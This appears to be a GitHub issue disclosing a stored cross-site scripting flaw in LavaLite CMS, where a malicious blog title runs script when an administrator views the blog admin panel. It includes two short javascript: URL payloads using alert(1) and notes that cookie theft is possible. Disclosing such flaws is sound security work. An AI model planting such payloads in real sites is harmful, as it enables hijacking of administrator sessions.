Vulnerability Report: sXss

I found a sXss vulnerability in the latest version of LavaLite CMS：
Users can create a malicious Blog Tittle that triggers malicious code when an administrator accesses the blog admin panel.
# **Exp:**
```javascript
<iframe src="javascript:alert(1)">test</iframe>
#or
<a href="javascript:alert(1)">test</a>
```
# Poc:
Triggered when an administrator visits the blog admin page:

![9ccf78d3a1829a35a6b368f3f5750fb](https://github.com/LavaLite/cms/assets/104337898/594a65ae-f3b3-4e73-90cc-52c5afcc654d)
![cd4b439e02d2ac5762be05e783e1133](https://github.com/LavaLite/cms/assets/104337898/4c388cc2-18ff-453b-a008-8713119f033e)
![c19a945d22e81bd14b1305eee840a69](https://github.com/LavaLite/cms/assets/104337898/b9fe99fd-94a7-464a-ad04-f16b2c54c59f)

# Affect：
Without httponly set, an attacker can steal the identity of an administrator or execute other malicious code.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Vulnerability Report: sXss #400

Exp:

Poc:

Affect：

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Vulnerability Report: sXss #400

Description

Exp:

Poc:

Affect：

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions